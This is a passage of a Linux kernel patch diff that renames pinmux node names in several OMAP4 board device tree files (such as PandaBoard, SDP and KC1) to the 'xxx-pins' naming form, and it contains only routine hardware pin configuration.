+-	w2cbw0015_pins: pinmux_w2cbw0015_pins {
++	w2cbw0015_pins: w2cbw0015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x066, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a19.gpio_43 */
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc1_pins: pinmux_mmc1_pins {
++	mmc1_pins: mmc1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0e2, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc1_clk */
+ 			OMAP4_IOPAD(0x0e4, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmcc1_cmd */
+@@ -144,7 +144,7 @@
+ 		>;
+ 	};
+ 
+-	mmc5_pins: pinmux_mmc5_pins {
++	mmc5_pins: mmc5-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk */
+ 			OMAP4_IOPAD(0x14a, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmcc5_cmd */
+diff --git a/arch/arm/boot/dts/omap4-kc1.dts b/arch/arm/boot/dts/omap4-kc1.dts
+index e59d17b25a1d9..c6b79ba8bbc91 100644
+--- a/arch/arm/boot/dts/omap4-kc1.dts
++++ b/arch/arm/boot/dts/omap4-kc1.dts
+@@ -35,42 +35,42 @@
+ &omap4_pmx_core {
+ 	pinctrl-names = "default";
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x144, PIN_INPUT | MUX_MODE0)		/* uart3_rx_irrx */
+ 			OMAP4_IOPAD(0x146, PIN_OUTPUT | MUX_MODE0)		/* uart3_tx_irtx */
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc2_pins: pinmux_mmc2_pins {
++	mmc2_pins: mmc2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x040, PIN_INPUT_PULLUP | MUX_MODE1)	/* sdmmc2_dat0 */
+ 			OMAP4_IOPAD(0x042, PIN_INPUT_PULLUP | MUX_MODE1)	/* sdmmc2_dat1 */
+@@ -85,7 +85,7 @@
+ 		>;
+ 	};
+ 
+-	usb_otg_hs_pins: pinmux_usb_otg_hs_pins {
++	usb_otg_hs_pins: usb-otg-hs-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x194, PIN_OUTPUT_PULLDOWN | MUX_MODE0)	/* usba0_otg_ce */
+ 			OMAP4_IOPAD(0x196, PIN_INPUT | MUX_MODE0)		/* usba0_otg_dp */
+diff --git a/arch/arm/boot/dts/omap4-mcpdm.dtsi b/arch/arm/boot/dts/omap4-mcpdm.dtsi
+index 915a9b31a33b4..03ade47431fbe 100644
+--- a/arch/arm/boot/dts/omap4-mcpdm.dtsi
++++ b/arch/arm/boot/dts/omap4-mcpdm.dtsi
+@@ -7,7 +7,7 @@
+  */
+ 
+ &omap4_pmx_core {
+-	mcpdm_pins: pinmux_mcpdm_pins {
++	mcpdm_pins: mcpdm-pins {
+ 		pinctrl-single,pins = <
+ 		/* 0x4a100106 abe_pdm_ul_data.abe_pdm_ul_data ag25 */
+ 		OMAP4_IOPAD(0x106, PIN_INPUT_PULLDOWN | MUX_MODE0)
+diff --git a/arch/arm/boot/dts/omap4-panda-common.dtsi b/arch/arm/boot/dts/omap4-panda-common.dtsi
+index 518652a599bd7..53b99004b19cf 100644
+--- a/arch/arm/boot/dts/omap4-panda-common.dtsi
++++ b/arch/arm/boot/dts/omap4-panda-common.dtsi
+@@ -237,14 +237,14 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x120, PIN_OUTPUT | MUX_MODE3)	/* hdq_sio.gpio_127 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)	/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -253,7 +253,7 @@
+ 		>;
+ 	};
+ 
+-	dss_dpi_pins: pinmux_dss_dpi_pins {
++	dss_dpi_pins: dss-dpi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x162, PIN_OUTPUT | MUX_MODE5)	/* dispc2_data23 */
+ 			OMAP4_IOPAD(0x164, PIN_OUTPUT | MUX_MODE5) 	/* dispc2_data22 */
+@@ -288,13 +288,13 @@
+ 		>;
+ 	};
+ 
+-	tfp410_pins: pinmux_tfp410_pins {
++	tfp410_pins: tfp410-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x184, PIN_OUTPUT | MUX_MODE3)	/* gpio_0 */
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -302,7 +302,7 @@
+ 		>;
+ 	};
+ 
+-	tpd12s015_pins: pinmux_tpd12s015_pins {
++	tpd12s015_pins: tpd12s015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a17.gpio_41 */
+ 			OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nbe1.gpio_60 */
+@@ -310,7 +310,7 @@
+ 		>;
+ 	};
+ 
+-	hsusbb1_pins: pinmux_hsusbb1_pins {
++	hsusbb1_pins: hsusbb1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0c2, PIN_INPUT_PULLDOWN | MUX_MODE4)	/* usbb1_ulpitll_clk.usbb1_ulpiphy_clk */
+ 			OMAP4_IOPAD(0x0c4, PIN_OUTPUT | MUX_MODE4)		/* usbb1_ulpitll_stp.usbb1_ulpiphy_stp */
+@@ -327,28 +327,28 @@
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+@@ -359,7 +359,7 @@
+ 	 * wl12xx GPIO outputs for WLAN_EN, BT_EN, FM_EN, BT_WAKEUP
+ 	 * REVISIT: Are the pull-ups needed for GPIO 48 and 49?
+ 	 */
+-	wl12xx_gpio: pinmux_wl12xx_gpio {
++	wl12xx_gpio: wl12xx-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x066, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a19.gpio_43 */
+ 			OMAP4_IOPAD(0x06c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a22.gpio_46 */
+@@ -369,7 +369,7 @@
+ 	};
+ 
+ 	/* wl12xx GPIO inputs and SDIO pins */
+-	wl12xx_pins: pinmux_wl12xx_pins {
++	wl12xx_pins: wl12xx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x078, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs2.gpio_52 */
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+@@ -382,7 +382,7 @@
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x114, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpio_121 */
+ 		>;
+@@ -390,7 +390,7 @@
+ };
+ 
+ &omap4_pmx_wkup {
+-	led_wkgpio_pins: pinmux_leds_wkpins {
++	led_wkgpio_pins: leds-wkpins-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x05a, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk7 */
+ 			OMAP4_IOPAD(0x05c, PIN_OUTPUT | MUX_MODE3)	/* gpio_wk8 */
+diff --git a/arch/arm/boot/dts/omap4-panda-es.dts b/arch/arm/boot/dts/omap4-panda-es.dts
+index 7c6886cd738f0..6c08dff58beae 100644
+--- a/arch/arm/boot/dts/omap4-panda-es.dts
++++ b/arch/arm/boot/dts/omap4-panda-es.dts
+@@ -38,26 +38,26 @@
+ };
+ 
+ &omap4_pmx_core {
+-	led_gpio_pins: gpio_led_pmx {
++	led_gpio_pins: gpio-led-pmx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_OUTPUT | MUX_MODE3)	/* gpio_110 */
+ 		>;
+ 	};
+ 
+-	button_pins: pinmux_button_pins {
++	button_pins: button-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fc, PIN_INPUT_PULLUP | MUX_MODE3) /* gpio_113 */
+ 		>;
+ 	};
+ 
+-	bt_pins: pinmux_bt_pins {
++	bt_pins: bt-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x06c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a22.gpio_46 - BTEN */
+ 			OMAP4_IOPAD(0x072, PIN_OUTPUT_PULLUP | MUX_MODE3)	/* gpmc_a25.gpio_49 - BTWAKEUP */
+ 		>;
+ 	};
+ 
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts - HCI */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+diff --git a/arch/arm/boot/dts/omap4-sdp.dts b/arch/arm/boot/dts/omap4-sdp.dts
+index 9e976140f34a6..b2cb93edbc3a6 100644
+--- a/arch/arm/boot/dts/omap4-sdp.dts
++++ b/arch/arm/boot/dts/omap4-sdp.dts
+@@ -214,7 +214,7 @@
+ 			&tpd12s015_pins
+ 	>;
+ 
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+@@ -223,7 +223,7 @@
+ 		>;
+ 	};
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x140, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
+ 			OMAP4_IOPAD(0x142, PIN_OUTPUT | MUX_MODE0)		/* uart3_rts_sd.uart3_rts_sd */
+@@ -232,21 +232,21 @@
+ 		>;
+ 	};
+ 
+-	uart4_pins: pinmux_uart4_pins {
++	uart4_pins: uart4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x15c, PIN_INPUT | MUX_MODE0)		/* uart4_rx.uart4_rx */
+ 			OMAP4_IOPAD(0x15e, PIN_OUTPUT | MUX_MODE0)		/* uart4_tx.uart4_tx */
+ 		>;
+ 	};
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x120, PIN_OUTPUT | MUX_MODE3)		/* hdq_sio.gpio_127 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	dmic_pins: pinmux_dmic_pins {
++	dmic_pins: dmic-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x110, PIN_OUTPUT | MUX_MODE0)		/* abe_dmic_clk1.abe_dmic_clk1 */
+ 			OMAP4_IOPAD(0x112, PIN_INPUT | MUX_MODE0)		/* abe_dmic_din1.abe_dmic_din1 */
+@@ -255,7 +255,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp1_pins: pinmux_mcbsp1_pins {
++	mcbsp1_pins: mcbsp1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0fe, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp1_clkx.abe_mcbsp1_clkx */
+ 			OMAP4_IOPAD(0x100, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp1_dr.abe_mcbsp1_dr */
+@@ -264,7 +264,7 @@
+ 		>;
+ 	};
+ 
+-	mcbsp2_pins: pinmux_mcbsp2_pins {
++	mcbsp2_pins: mcbsp2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE0)		/* abe_mcbsp2_clkx.abe_mcbsp2_clkx */
+ 			OMAP4_IOPAD(0x0f8, PIN_INPUT_PULLDOWN | MUX_MODE0)	/* abe_mcbsp2_dr.abe_mcbsp2_dr */
+@@ -273,7 +273,7 @@
+ 		>;
+ 	};
+ 
+-	mcspi1_pins: pinmux_mcspi1_pins {
++	mcspi1_pins: mcspi1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x132, PIN_INPUT | MUX_MODE0)		/*  mcspi1_clk.mcspi1_clk */
+ 			OMAP4_IOPAD(0x134, PIN_INPUT | MUX_MODE0)		/*  mcspi1_somi.mcspi1_somi */
+@@ -282,7 +282,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -290,7 +290,7 @@
+ 		>;
+ 	};
+ 
+-	tpd12s015_pins: pinmux_tpd12s015_pins {
++	tpd12s015_pins: tpd12s015-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a17.gpio_41 */
+ 			OMAP4_IOPAD(0x088, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nbe1.gpio_60 */
+@@ -298,28 +298,28 @@
+ 		>;
+ 	};
+ 
+-	i2c1_pins: pinmux_i2c1_pins {
++	i2c1_pins: i2c1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x122, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_scl */
+ 			OMAP4_IOPAD(0x124, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c1_sda */
+ 		>;
+ 	};
+ 
+-	i2c2_pins: pinmux_i2c2_pins {
++	i2c2_pins: i2c2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x126, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_scl */
+ 			OMAP4_IOPAD(0x128, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c2_sda */
+ 		>;
+ 	};
+ 
+-	i2c3_pins: pinmux_i2c3_pins {
++	i2c3_pins: i2c3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12a, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_scl */
+ 			OMAP4_IOPAD(0x12c, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c3_sda */
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+@@ -327,14 +327,14 @@
+ 	};
+ 
+ 	/* wl12xx GPIO output for WLAN_EN */
+-	wl12xx_gpio: pinmux_wl12xx_gpio {
++	wl12xx_gpio: wl12xx-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x07c, PIN_OUTPUT | MUX_MODE3)		/* gpmc_nwp.gpio_54 */
+ 		>;
+ 	};
+ 
+ 	/* wl12xx GPIO inputs and SDIO pins */
+-	wl12xx_pins: pinmux_wl12xx_pins {
++	wl12xx_pins: wl12xx-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x07a, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs3.gpio_53 */
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk.sdmmc5_clk */
+@@ -347,13 +347,13 @@
+ 	};
+ 
+ 	/* gpio_48 for ENET_ENABLE */
+-	enet_enable_gpio: pinmux_enet_enable_gpio {
++	enet_enable_gpio: enet-enable-gpio-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x070, PIN_OUTPUT_PULLDOWN | MUX_MODE3)	/* gpmc_a24.gpio_48 */
+ 		>;
+ 	};
+ 
+-	ks8851_pins: pinmux_ks8851_pins {
++	ks8851_pins: ks8851-pins {
+ 		pinctrl-single,pins = <
+ 			/* ENET_INT */
+ 			OMAP4_IOPAD(0x054, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_ad10.gpio_34 */
+diff --git a/arch/arm/boot/dts/omap4-var-om44customboard.dtsi b/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
+index 458cb53dd3d18..cadc7e02592bf 100644
+--- a/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
++++ b/arch/arm/boot/dts/omap4-var-om44customboard.dtsi
+@@ -60,7 +60,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	uart1_pins: pinmux_uart1_pins {
++	uart1_pins: uart1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x13c, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi1_cs2.uart1_cts */
+ 			OMAP4_IOPAD(0x13e, PIN_OUTPUT | MUX_MODE1)		/* mcspi1_cs3.uart1_rts */
+@@ -69,7 +69,7 @@
+ 		>;
+ 	};
+ 
+-	mcspi1_pins: pinmux_mcspi1_pins {
++	mcspi1_pins: mcspi1-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x132, PIN_INPUT | MUX_MODE0)		/*  mcspi1_clk.mcspi1_clk */
+ 			OMAP4_IOPAD(0x134, PIN_INPUT | MUX_MODE0)		/*  mcspi1_somi.mcspi1_somi */
+@@ -78,13 +78,13 @@
+ 		>;
+ 	};
+ 
+-	mcasp_pins: pinmux_mcsasp_pins {
++	mcasp_pins: mcsasp-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f8, PIN_OUTPUT | MUX_MODE2)		/*  mcbsp2_dr.abe_mcasp_axr */
+ 		>;
+ 	};
+ 
+-	dss_dpi_pins: pinmux_dss_dpi_pins {
++	dss_dpi_pins: dss-dpi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x162, PIN_OUTPUT | MUX_MODE5)		/* dispc2_data23 */
+ 			OMAP4_IOPAD(0x164, PIN_OUTPUT | MUX_MODE5)		/* dispc2_data22 */
+@@ -117,7 +117,7 @@
+ 		>;
+ 	};
+ 
+-	dss_hdmi_pins: pinmux_dss_hdmi_pins {
++	dss_hdmi_pins: dss-hdmi-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x09a, PIN_INPUT | MUX_MODE0)		/* hdmi_cec.hdmi_cec */
+ 			OMAP4_IOPAD(0x09c, PIN_INPUT_PULLUP | MUX_MODE0)	/* hdmi_scl.hdmi_scl */
+@@ -125,14 +125,14 @@
+ 		>;
+ 	};
+ 
+-	i2c4_pins: pinmux_i2c4_pins {
++	i2c4_pins: i2c4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x12e, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_scl */
+ 			OMAP4_IOPAD(0x130, PIN_INPUT_PULLUP | MUX_MODE0)	/* i2c4_sda */
+ 		>;
+ 	};
+ 
+-	mmc5_pins: pinmux_mmc5_pins {
++	mmc5_pins: mmc5-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x0f6, PIN_INPUT | MUX_MODE3)		/* abe_mcbsp2_clkx.gpio_110 */
+ 			OMAP4_IOPAD(0x148, PIN_INPUT_PULLUP | MUX_MODE0)	/* sdmmc5_clk.sdmmc5_clk */
+@@ -144,32 +144,32 @@
+ 		>;
+ 	};
+ 
+-	gpio_led_pins: pinmux_gpio_led_pins {
++	gpio_led_pins: gpio-led-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x17e, PIN_OUTPUT | MUX_MODE3)		/* kpd_col4.gpio_172 */
+ 			OMAP4_IOPAD(0x180, PIN_OUTPUT | MUX_MODE3)		/* kpd_col5.gpio_173 */
+ 		>;
+ 	};
+ 
+-	gpio_key_pins: pinmux_gpio_key_pins {
++	gpio_key_pins: gpio-key-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x1a2, PIN_INPUT | MUX_MODE3)		/* sys_boot0.gpio_184 */
+ 		>;
+ 	};
+ 
+-	ks8851_irq_pins: pinmux_ks8851_irq_pins {
++	ks8851_irq_pins: ks8851-irq-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x17c, PIN_INPUT_PULLUP | MUX_MODE3)	/* kpd_col3.gpio_171 */
+ 		>;
+ 	};
+ 
+-	hdmi_hpd_pins: pinmux_hdmi_hpd_pins {
++	hdmi_hpd_pins: hdmi-hpd-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x098, PIN_INPUT_PULLDOWN | MUX_MODE3)	/* hdmi_hpd.gpio_63 */
+ 		>;
+ 	};
+ 
+-	backlight_pins: pinmux_backlight_pins {
++	backlight_pins: backlight-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x116, PIN_OUTPUT | MUX_MODE3)		/* abe_dmic_din3.gpio_122 */
+ 		>;
+diff --git a/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi b/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
+index d0032213101e6..de779d2d7c3e9 100644
+--- a/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
++++ b/arch/arm/boot/dts/omap4-var-som-om44-wlan.dtsi
+@@ -19,7 +19,7 @@
+ };
+ 
+ &omap4_pmx_core {
+-	uart2_pins: pinmux_uart2_pins {
++	uart2_pins: uart2-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x118, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart2_cts.uart2_cts */
+ 			OMAP4_IOPAD(0x11a, PIN_OUTPUT | MUX_MODE0)		/* uart2_rts.uart2_rts */
+@@ -28,7 +28,7 @@
+ 		>;
+ 	};
+ 
+-	wl12xx_ctrl_pins: pinmux_wl12xx_ctrl_pins {
++	wl12xx_ctrl_pins: wl12xx-ctrl-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x062, PIN_INPUT_PULLUP | MUX_MODE3)	/* gpmc_a17.gpio_41 (WLAN_IRQ) */
+ 			OMAP4_IOPAD(0x064, PIN_OUTPUT | MUX_MODE3)		/* gpmc_a18.gpio_42 (BT_EN) */
+@@ -36,7 +36,7 @@
+ 		>;
+ 	};
+ 
+-	mmc4_pins: pinmux_mmc4_pins {
++	mmc4_pins: mmc4-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x154, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi4_clk.sdmmc4_clk */
+ 			OMAP4_IOPAD(0x156, PIN_INPUT_PULLUP | MUX_MODE1)	/* mcspi4_simo.sdmmc4_cmd */
+diff --git a/arch/arm/boot/dts/omap4-var-som-om44.dtsi b/arch/arm/boot/dts/omap4-var-som-om44.dtsi
+index 334cbbaa5b8b0..37d56b3010cff 100644
+--- a/arch/arm/boot/dts/omap4-var-som-om44.dtsi
++++ b/arch/arm/boot/dts/omap4-var-som-om44.dtsi
+@@ -65,21 +65,21 @@
+ 			&hsusbb1_pins
+ 	>;
+ 
+-	twl6040_pins: pinmux_twl6040_pins {
++	twl6040_pins: twl6040-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x19c, PIN_OUTPUT | MUX_MODE3)		/* fref_clk2_out.gpio_182 */
+ 			OMAP4_IOPAD(0x1a0, PIN_INPUT | MUX_MODE0)		/* sys_nirq2.sys_nirq2 */
+ 		>;
+ 	};
+ 
+-	tsc2004_pins: pinmux_tsc2004_pins {
++	tsc2004_pins: tsc2004-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x090, PIN_INPUT | MUX_MODE3)		/* gpmc_ncs4.gpio_101 (irq) */
+ 			OMAP4_IOPAD(0x092, PIN_OUTPUT | MUX_MODE3)		/* gpmc_ncs5.gpio_102 (rst) */
+ 		>;
+ 	};
+ 
+-	uart3_pins: pinmux_uart3_pins {
++	uart3_pins: uart3-pins {
+ 		pinctrl-single,pins = <
+ 			OMAP4_IOPAD(0x140, PIN_INPUT_PULLUP | MUX_MODE0)	/* uart3_cts_rctx.uart3_cts_rctx */
